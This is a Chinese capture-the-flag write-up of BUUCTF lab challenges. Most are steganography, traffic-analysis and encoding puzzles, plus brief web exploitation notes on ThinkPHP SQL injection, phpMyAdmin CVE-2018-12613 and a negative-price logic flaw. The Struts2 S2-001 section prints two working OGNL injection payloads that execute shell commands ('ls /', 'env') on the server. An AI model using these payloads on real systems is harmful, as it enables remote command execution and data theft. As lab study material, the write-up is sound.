BUUCTF-做题记录

很久没做题了,还是随便来水一水吧,之前都在学别的。

目录

  • [INSHack2017]remote-multimedia-controller
  • [INSHack2017]hiding-in-plain-sight
  • [QCTF2018]X-man-Keyword
  • [BSidesSF2019]diskimage
  • [2022红包题]虎年大吉
  • [WMCTF2020]行为艺术
  • [MRCTF2020]寻找xxx
  • [ThinkPHP]IN SQL INJECTION
  • [PHPMYADMIN]CVE-2018-12613
  • [struts2]s2-001
  • [第三章 web进阶]逻辑漏洞

[INSHack2017]remote-multimedia-controller

在这里插入图片描述
流量包,因此选择直接搜看有没有flag
在这里插入图片描述
针对该流进行tcp流的跟踪。
在这里插入图片描述
发现存在一个特殊字符串,用CyberChef直接梭
在这里插入图片描述
flag:

flag{TCP_s0ck3t_4n4lys1s_c4n_b3_fun!}

[INSHack2017]hiding-in-plain-sight

在这里插入图片描述
直接用tokeii👴网站的工具
在这里插入图片描述
然后将foremost后的结果进行下载。
在这里插入图片描述
得到隐藏的flag
在这里插入图片描述
flag:

flag{l337_h4xx0r5_c0mmun1c473_w17h_PNGs}

[QCTF2018]X-man-Keyword

在这里插入图片描述
查看lsb,发现通道内有东西,直接用脚本解得到一串字符。

PVSF{vVckHejqBOVX9C1c13GFfkHJrjIQeMwf}

根据lovekfc,然后进行关键字解密
在这里插入图片描述
再根据大小写修改一一对应的位置,得到真正的flag

flag{cCgeLdnrIBCX9G1g13KFfeLNsnMRdOwf}

[BSidesSF2019]diskimage

在这里插入图片描述

老样子zsteg梭一下
在这里插入图片描述
提取出该数据
在这里插入图片描述
然后利用kali自带的testdisk提取其中的图片

testdisk 1.dat

在这里插入图片描述
把这个图片重命名为1.png打开得到flag
在这里插入图片描述
flag:

flag{FAT12_FTW}

[2022红包题]虎年大吉

在这里插入图片描述
工具题,用ciphey直接解
在这里插入图片描述
flag:

flag{29186995}

[WMCTF2020]行为艺术

在这里插入图片描述
打开后有hint.txt,内容

md5sum flag.zip
17f5b08342cf65f6dc08ed0b4c9bd334 flag.zip

另一个文件则是一个图片,里面有504B开头,盲猜应该是一个压缩包的十六进制,但是好像没看见尾部,所以修改图片的高度。
在这里插入图片描述
得到完整的图片
在这里插入图片描述
提取出来得到

504B0304140000000800DB93C55086A39007D8000000DF01000008000000666C61672E74787475504B0E823010DD93708771DDCCB0270D5BBD0371815A9148AC6951C2ED9D271F89C62E2693D7F76BB7DE9FC80D2E6E68E782A326D2E01F81CE6D55E76972E9BA7BCCB3ACEF7B89F7B6E90EA16A6EE2439D45179ECDD1C5CCFB6B9AA489C1218C92B898779D765FCCBB58CC920B6662C5F91749931132258F32BBA7C288C5AE103133106608409DAC419F77241A3412907814AB7A922106B8DED0D25AEC8A634929025C46A33FE5A1D3167A100323B1ABEE4A7A0708413A19E17718165F5D3E73D577798E36D5144B66315AAE315078F5E51A29246AF402504B01021F00140009000800DB93C55086A39007D8000000DF010000080024000000000000002000000000000000666C61672E7478740A00200000000000010018004A0A9A64243BD601F9D8AB39243BD6012D00CA13223BD601504B050600000000010001005A000000FE00000000000000

在这里插入图片描述
得到加密后的zip文件。
利用010查看发现是一个伪加密,修改对应的位由09改为00
在这里插入图片描述
打开后有一个典型的brainfuck编码
在这里插入图片描述
利用网站一把梭
在这里插入图片描述
flag:

flag{wai_bi_baaaa_bo!2333~~~}

[MRCTF2020]寻找xxx

在这里插入图片描述
打开来有个wav,里面是拨号音,直接丢在线解码工具进行解,得到号码。
(由于在BUUCTF进行复现,所以只能做到这一步)
在这里插入图片描述
flag去网上随便找的

flag{Oh!!!!!_Y0u_f1nd_my_secret}

[ThinkPHP]IN SQL INJECTION

在这里插入图片描述
利用payload获取数据库名
在这里插入图片描述
然后在爆破信息里面就有flag了
在这里插入图片描述

[PHPMYADMIN]CVE-2018-12613

在这里插入图片描述
先利用sql执行输入phpinfo
在这里插入图片描述
查看一下session的 值
在这里插入图片描述
由于session已经进行了存储,因此可以直接访问session 的文件得到phpinfo()
在这里插入图片描述
查到flag
在这里插入图片描述

[struts2]s2-001

在这里插入图片描述

利用payload实现命令执行
在这里插入图片描述
在password框内输入要执行的命令
在这里插入图片描述

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","/"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

根据经验,一般都在env环境变量当中有flag
在这里插入图片描述

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

[第三章 web进阶]逻辑漏洞

在这里插入图片描述
打开一个登陆界面,然后随便输入admin/123进行登陆
在这里插入图片描述
进入后有个卖书的位置
在这里插入图片描述
直接买flag买不起
在这里插入图片描述
尝试购买nice,发现可以购买
在这里插入图片描述
利用购买的成功请求包,将cost参数改成复数。
在这里插入图片描述
改成-9999
在这里插入图片描述
重新购买得到flag
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/138785.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

FPGA project : flash_secter_erase

flash的指定扇区擦除实验。 先发写指令,再进入写锁存周期等待500ns,进入写扇区擦除指令,然后写扇区地址,页地址,字节地址。即可完成扇区擦除。 模块框图: 时序图: 代码: module…

Redis 图形化界面下载及使用超详细教程(带安装包)! redis windows下客户端下载

另一个完全不同的redis图形化界面教程链接(带安装包): Redis 最流行的图形化界面下载及使用超详细教程(带安装包)! redis windows客户端下载_dream_ready的博客-CSDN博客 redis图形化界面的压缩包&#xff…

使用new创建动态结构

在运行时创建数组优于在编译时创建数组,对于结构(同一个结构可以存储多种类型的数据。)也是如此。需要在程序运行时为结构分配所需的空间,这也可以使用new运算符来完成。通过使用new,可以创建动态结构。同样&#xff0…

云原生Kubernetes:K8S集群版本升级(v1.20.6 - v1.20.15)

目录 一、理论 1.K8S集群升级 2.集群概况 3.升级集群 4.验证集群 二、实验 1.升级集群 2.验证集群 三、问题 1.给node1节点打污点报错 一、理论 1.K8S集群升级 (1)概念 搭建K8S集群的方式有很多种,比如二进制,kubeadm…

新时代高效记账:自动化智能如何进行财务管理

随着科技的不断发展,自动化智能已经逐渐渗透到我们生活的各个领域。在财务管理中,自动化智能的应用显得尤为重要。它不仅可以提高财务管理的效率和精度,还能帮助我们更好地规划和掌控公司的财务状况 晨曦记账本提供了多种高效财务管理工具。…

ModStartCMS v7.4.0 公共图片库支持,安全功能升级

ModStart 是一个基于 Laravel 模块化极速开发框架。模块市场拥有丰富的功能应用,支持后台一键快速安装,让开发者能快的实现业务功能开发。 系统完全开源,基于 Apache 2.0 开源协议,免费且不限制商业使用。 功能特性 丰富的模块市…

专业课138,总分390+,西工大,西北工业大学827信号与系统考研分享

数学一 考研数学其实严格意义上已经没有难度大小年之分了,说21年难的会说22年简单,说22年简单的做23年又会遭重,所以其实只是看出题人合不合你的口味罢了,建议同学不要因偶数年而畏惧,踏踏实实复习。资料方面跟谁就用…

【Unity引擎核心-Object,序列化,资产管理,内存管理】

文章目录 整体介绍Native & Managed Objects什么是序列化序列化用来做什么Editor和运行时序列化的区别脚本序列化针对序列化的使用建议 Unity资产管理导入Asset Process为何要做引擎资源文件导入Main-Assets和 Sub-Assets资产的导入管线Hook,AssetPostprocessor…

直播美颜技术的技术背后:美颜SDK的原理与实践

对于美颜美颜SDK来说大家都不会陌生,通过它,我们能够实现实时美颜效果,改善视频质量,吸引更多观众。 一、美颜SDK是什么? 美颜SDK为开发者提供了一整套美颜和图像处理功能,用于实时处理直播视频流。这个工…

加固数据安全:Java助力保护Excel文件,让数据无懈可击

摘要:本文由葡萄城技术团队于CSDN原创并首发。转载请注明出处:葡萄城官网,葡萄城为开发者提供专业的开发工具、解决方案和服务,赋能开发者。 前言 Excel文件保护是常用的一种功能,文件保护主要有三种: 添…

jmeter监控服务器的资源使用

一. 下载安装包SeverAgent-x.x.x.zip并安装到被监控服务器 下载地址:https://github.com/undera/perfmon-agent 下载完解压后执行运行,windows运行startAgent.bat, linux运行startAgent.sh 二. 在jmeter上添加插件jpgc-PerfMon Metrics Collector监听器…

【数据结构】排序--快速排序

目录 一 概念 二 快速排序的实现 1. hoare版本 (1)代码实现 (2)单趟排序图解 (3) 递归实现图解 (4)细节控制 (5)时间复杂度 (6)三数取中优化 2 挖坑法 (1)代码实现 (2)单趟图解 3 前后指针法 (1) 代码实现 (2) 单趟图解 ​编辑4 优化子区间 5 非递归快速排…